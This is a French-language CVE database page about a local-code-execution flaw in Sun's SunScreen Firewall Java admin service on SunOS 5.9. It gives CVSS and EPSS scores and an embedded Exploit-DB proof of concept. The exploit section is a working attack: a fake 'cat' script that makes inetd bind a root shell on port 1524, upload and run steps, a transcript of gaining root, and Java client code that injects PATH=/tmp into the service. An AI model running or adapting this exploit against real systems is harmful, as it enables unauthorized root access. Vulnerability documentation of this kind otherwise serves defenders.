CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Multiple untrusted search path vulnerabilities in the Java Service in Sun Microsystems SunScreen Firewall on SunOS 5.9 allow local users to execute arbitrary code via a modified (1) PATH or (2) LD_LIBRARY_PATH environment variable.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.9
AV:L/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.9%
–
–
2022-04-03
–
–
1.9%
–
–
2022-04-24
–
–
1.9%
–
–
2022-09-11
–
–
1.9%
–
–
2023-03-12
–
–
–
0.05%
–
2023-09-17
–
–
–
0.05%
–
2023-09-24
–
–
–
0.05%
–
2023-10-01
–
–
–
0.04%
–
2023-10-15
–
–
–
0.04%
–
2023-12-03
–
–
–
0.04%
–
2024-03-24
–
–
–
0.04%
–
2024-04-21
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2024-07-14
–
–
–
0.04%
–
2024-08-04
–
–
–
0.04%
–
2024-08-11
–
–
–
0.04%
–
2024-11-17
–
–
–
0.04%
–
2024-12-22
–
–
–
0.39%
–
2025-01-19
–
–
–
0.39%
–
2025-03-18
–
–
–
–
9.11%
2025-03-30
–
–
–
–
7.51%
2025-04-15
–
–
–
–
6.93%
2025-04-15
–
–
–
–
6.93,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2011-01-24 23h00 +00:00 Auteur : kingcope EDB Vérifié : No
/*
Sun Microsystems SunScreen Firewall Root Exploit
discovered & exploited by Kingcope
January 2011
The SunScreen Firewall can be administrated remotely via a java protocol service
which is running on port 3858 on a SunOS machine.
This Java Service contains numerous buffer overruns (2 of which I am aware of).
Furthermore it is possible to execute arbitrary code if an attacker manages
to upload a file onto the target system.
As you can see in the following java exploit code the environment
is not properly sanitized prior to executing shell scripts as root,
thus one can use the LD technique to preload binaries or even easier
modify the PATH variable to forge the ´cat´ binary (which is executed by lib/screenname)
to be executed in a different place.
This can be exploited locally - remotely especially if anonymous ftp uploads
are possible or any other file transfer protocol is activated. Uploading
a file via the line printer daemon might also be possible.
This has been tested on a SunOS 5.9.
The shell script to be forged as the ´cat´ binary..
#!/bin/sh
echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;
/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x
echo "+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++"
#---
upload above shell script to /PATH/cat
chmod a+x /PATH/cat
supply target and PATH envvar to exploit
Opens a root shell on port 1524/tcp (ingreslock)
A successfull exploit looks like
$ java SimpleClient
? ??ð? &Connection accepted, no authentication¶? O
+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED Y
A+++
$ telnet 192.168.2.3 1524
Trying 192.168.2.3...
Connected to 192.168.2.3.
Escape character is '^]'.
# /bin/uname -a;
SunOS unknown 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
^M: not found
# /b
in/id;
uid=0(root) gid=1(other)
^M: not found
#
*/
import java.net.*;
import java.io.*;
import java.util.*;
import java.text.DateFormat;
public class SimpleClient {
public static void main(String args[]) {
String str;
try {
Socket s1 = new Socket("192.168.2.3", 3853);
InputStream is = s1.getInputStream();
DataInputStream dis = new DataInputStream(is);
OutputStream s1out = s1.getOutputStream();
DataOutputStream dos = new DataOutputStream(s1out);
dos.writeByte(1);
dos.writeByte(0);
dos.writeShort(0);
dos.writeInt(0);
dos.writeByte(3);
dos.writeByte(0);
dos.writeShort(2000);
dos.writeShort(0);
dos.writeShort(0);
dos.writeUTF("0xtest");
dos.writeByte(3);
dos.writeByte(1);
dos.writeByte(1);
dos.writeByte(1);
dos.writeInt(3);
dos.writeInt(0);
dos.writeInt(0);
dos.writeUTF("PATH=/tmp");
dos.writeUTF("lib/screenname");
dos.writeUTF("admin1");
str = dis.readLine();
System.out.println(str);
str = dis.readLine();
System.out.println(str);
dis.close();
dos.close();
s1.close();
} catch (ConnectException connExc) {
System.err.println("Could not connect to the server.");
} catch (IOException e) {
// foo
}
}
}
Products Mentioned
Configuraton 0
Oracle>>Sun_microsystems_sunscreen_firewall >> Version *